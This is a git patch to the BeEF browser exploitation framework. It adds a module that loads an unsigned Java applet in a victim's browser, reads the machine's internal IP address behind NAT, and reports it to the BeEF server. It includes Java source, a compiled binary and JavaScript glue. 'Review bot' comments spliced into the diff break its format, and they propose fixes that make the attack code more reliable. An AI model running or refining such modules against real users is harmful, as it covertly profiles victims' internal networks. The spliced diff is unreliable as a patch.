From 217edee831eab5e718ae021a28c8883c696a26dc Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Fri, 20 Apr 2012 13:59:58 +0100
Subject: [PATCH] Added get_internal_ip module (uses an unsigned applet). Fix issue 576
---
 modules/host/get_internal_ip/command.js | 42 +++++++++++++++
 modules/host/get_internal_ip/config.yaml | 26 ++++++++++
 .../get_internal_ip/get_internal_ip.class | Bin 0 -> 1397 bytes
 .../host/get_internal_ip/get_internal_ip.java | 49 ++++++++++++++++++
 modules/host/get_internal_ip/module.rb | 35 +++++++++++++
 5 files changed, 152 insertions(+)
 create mode 100755 modules/host/get_internal_ip/command.js
 create mode 100755 modules/host/get_internal_ip/config.yaml
 create mode 100755 modules/host/get_internal_ip/get_internal_ip.class
 create mode 100755 modules/host/get_internal_ip/get_internal_ip.java
 create mode 100755 modules/host/get_internal_ip/module.rb
diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js
new file mode 100755
index 000000000..abc000788
--- /dev/null
+++ b/modules/host/get_internal_ip/command.js
@@ -0,0 +1,42 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
+ var output;
+ beef.dom.attachApplet('get_internal_ip', 'get_internal_ip', 'get_internal_ip' ,
+ applet_uri, null, null);
+
+ function waituntilok() {
+ try {
+ output = document.get_internal_ip.ip();
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, output);
+ beef.dom.detachApplet('get_internal_ip');
+ return;
+ } catch (e) {
+ internal_counter++;
+ if (internal_counter > timeout) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Timeout after '+timeout+' seconds');
+ beef.dom.detachApplet('get_internal_ip');
+ return;
+ }
+ setTimeout(function() {waituntilok()},1000);
+ }
+ }
+
+ setTimeout(function() {waituntilok()},5000);
+
+});
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
new file mode 100755
index 000000000..68a4d63c3
--- /dev/null
+++ b/modules/host/get_internal_ip/config.yaml
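Review bot: `internal_counter` and `timeout` are incremented and compared inside the `catch` block of `waituntilok` but are never declared anywhere in this file; unless the framework injects both as globals, the first failed `document.get_internal_ip.ip()` call raises a ReferenceError from inside the handler, so neither the 1-second retry nor the "Timeout after" report is ever reached. Declare them next to `var output;`, e.g. `var internal_counter = 0;` and `var timeout = <seconds — choose>;`, so the retry loop has a defined bound. As a point of style, `setTimeout(function() {waituntilok()},1000)` can simply be `setTimeout(waituntilok, 1000)` (same for the 5000 ms call).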
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_internal_ip:
+ enable: true
+ category: "Host"
+ name: "Get Internal IP"
+ description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet"
+ authors: ["antisnatchor"]
+ target:
+ working: ["IE", "FF", "O"]
+ user_notify: ["C", "S"]
diff --git a/modules/host/get_internal_ip/get_internal_ip.class b/modules/host/get_internal_ip/get_internal_ip.class new file mode 100755 index 0000000000000000000000000000000000000000..ee31c505bf9f6010277299d89476881871a38585 GIT binary patch literal 1397 zcmZux+fvg|6kVrHni7K4(u#<8QQL~3D5&6#LcwA$*eZ^`IH6=Zfs)iV_3|nD;-jxR zqh&^C9H0Ft$92*Q6`5()-pN_}wsz8AzrXzeFoh>NhH*KJi9Q^`q=YLHuIhv-9oKMO z!nB4N9eubV;iisTmp6kYZQHTEySz;#*94RWcf%4G%-N1rXl<`sjmPGC zjZc*P+w7`9Jn=kvQ09TMXI8fIX5FW2SYlIblwC4ZR$yB;i^dWMhO14_Y>=au-BzPw zE!nbUtZI2L{&xJru20B`3>?P^0j=e1Iqqx6z)_4CI3{6K!ZIFc$QoEd(!fJ-!a-jM z$MPo2Ze`2zWQM$f0*V?|4Lm}UoT=&QiJr?q31xxN9u2KZt6_U@GjA$Z-LqXspl_*I zN@o`rGX;U6J!TI>&6G;Tl7YvvMr4oDS%`ttIK$fe#^mmNrdhAo*z~+_{s}LxZ(0?q zB_kKzN^9G4ytLV*WRbt}%5k5Ra@@J$C+pr*IL171n~av;sw-9J>azkz68|qYE8huO zCg)bn+Wf{w!)i7Kj`o(xGI#fcXzM25wc#k%o=mWd&_nvn@c_y=8-kE;2Js~C<`AF<45xM=QqjOy1btL|R6p}b;1n?m zg{Twzi3TDVU?}&}NhAV136b$K8px;G2(_UVBC9h>#}5ZS!05U&%6IfVyBt?`ptsTA zhB2#-sL_Eo4!uWcM9qIhWLAwvXv4J8{OCK3>GAX!d_rGDXgAK1$Pjqu6tVQYz!FVAJ%zt5=eG5 x^kZd=n)-s^CpsPJ<;FmoU|$DOmHpIlQd7H~$fe5!Vy}Tt#w&b$i3b6U{{f5w2qypl literal 0 HcmV?d00001 diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java new file mode 100755 index 000000000..2882d1de1 --- /dev/null +++ b/modules/host/get_internal_ip/get_internal_ip.java 
@@ -0,0 +1,49 @@
+import java.applet.Applet;
+import java.applet.AppletContext;
+import java.net.InetAddress;
+import java.net.Socket;
+
+/* to compiled it in MacOSX SnowLeopard/Lion:
+* javac -cp /System/Library/Frameworks/JavaVM.framework/Resources/Deploy.bundle/Contents/Resources/Java/plugin.jar get_internal_ip.java
+* author: antisnatchor (adapted from Lars Kindermann applet)
+*/
+public class get_internal_ip extends Applet {
+ String Ip = "unknown";
+ String internalIp = "unknown";
+ String IpL = "unknown";
+
+ private String MyIP(boolean paramBoolean) {
+ Object obj = "unknown";
+ String str2 = getDocumentBase().getHost();
+ int i = 80;
+ if (getDocumentBase().getPort() != -1) i = getDocumentBase().getPort();
+ try {
+ String str1 = new Socket(str2, i).getLocalAddress().getHostAddress();
+ if (!str1.equals("255.255.255.255")) obj = str1;
+ } catch (SecurityException localSecurityException) {
+ obj = "FORBIDDEN";
+ } catch (Exception localException1) {
+ obj = "ERROR";
+ }
+ if (paramBoolean) try {
+ obj = new Socket(str2, i).getLocalAddress().getHostName();
+ } catch (Exception localException2) {
+ }
+ return (String) obj;
+ }
+
+ public void init() {
+ this.Ip = MyIP(false);
+ }
+
+ public String ip() {
+ return this.Ip;
+ }
+
+ public String internalIp() {
+ return this.internalIp;
+ }
+
+ public void start() {
+ }
+}
\ No newline at end of file
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
new file mode 100755
index 000000000..cb950806a
--- /dev/null
+++ b/modules/host/get_internal_ip/module.rb
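Review bot: Both `new Socket(str2, i)` calls in `MyIP` are created as temporaries and never closed, so every applet load leaks a connected socket until the plugin JVM collects it; hold the socket in a local and close it in `finally` (try-with-resources only if the plugin's target Java level allows it, which the 2012-era compile comment suggests it may not). Related dead code in the same hunk: `internalIp` and `IpL` are never assigned, so `internalIp()` always returns its initial `"unknown"`, the `AppletContext` and `InetAddress` imports are unused, and `catch (Exception localException2) {}` swallows the failure silently — name the variable `ignored` with a one-line reason or drop the branch. A header Javadoc on the class, e.g. `/** Reports the local address of the socket the browser uses to reach the document host; "FORBIDDEN" on SecurityException, "ERROR" otherwise. */`, would also make the three sentinel strings discoverable. Separately, this patch checks in the compiled `get_internal_ip.class` next to the source; a binary cannot be reviewed, so it should be reproducibly rebuilt from this `.java` (the `javac` line in the header comment) by the build rather than committed.
```java
    private String MyIP(boolean paramBoolean) {
        // … unchanged: obj / str2 / port resolution …
        Socket s = null;
        try {
            s = new Socket(str2, i);
            String str1 = s.getLocalAddress().getHostAddress();
            if (!str1.equals("255.255.255.255")) obj = str1;
        } catch (SecurityException localSecurityException) {
            obj = "FORBIDDEN";
        } catch (Exception localException1) {
            obj = "ERROR";
        } finally {
            if (s != null) try { s.close(); } catch (Exception ignored) { /* already failed or done */ }
        }
        // … unchanged: optional host-name lookup (apply the same close-in-finally) and return …
```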
@@ -0,0 +1,35 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Get_internal_ip < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip/get_internal_ip.class', '/get_internal_ip', 'class')
+ end
+
+ #def self.options
+ # return [
+ # { 'name' => 'applet_name', 'description' => 'Applet Name', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' },
+ # ]
+ #end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class')
+ end
+
+end
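Review bot: The commented-out `self.options` block (`#def self.options` through `#end`) is dead code evidently copied from another module — its single entry is labelled `'Number'` with value `'5551234'` and has nothing to do with this command — and should be deleted rather than left as commented-out code. Second, `pre_send` binds the asset with path `'/get_internal_ip'` plus extension `'class'` while `post_execute` unbinds `'/get_internal_ip.class'`; presumably `AssetHandler.bind` composes the served URL from those two arguments, but confirm the two spellings agree, since a mismatch leaves the class file bound after the command completes. A one-line comment on `pre_send`, e.g. `# Serve the compiled applet for the duration of this command; released in post_execute`, would document that pairing.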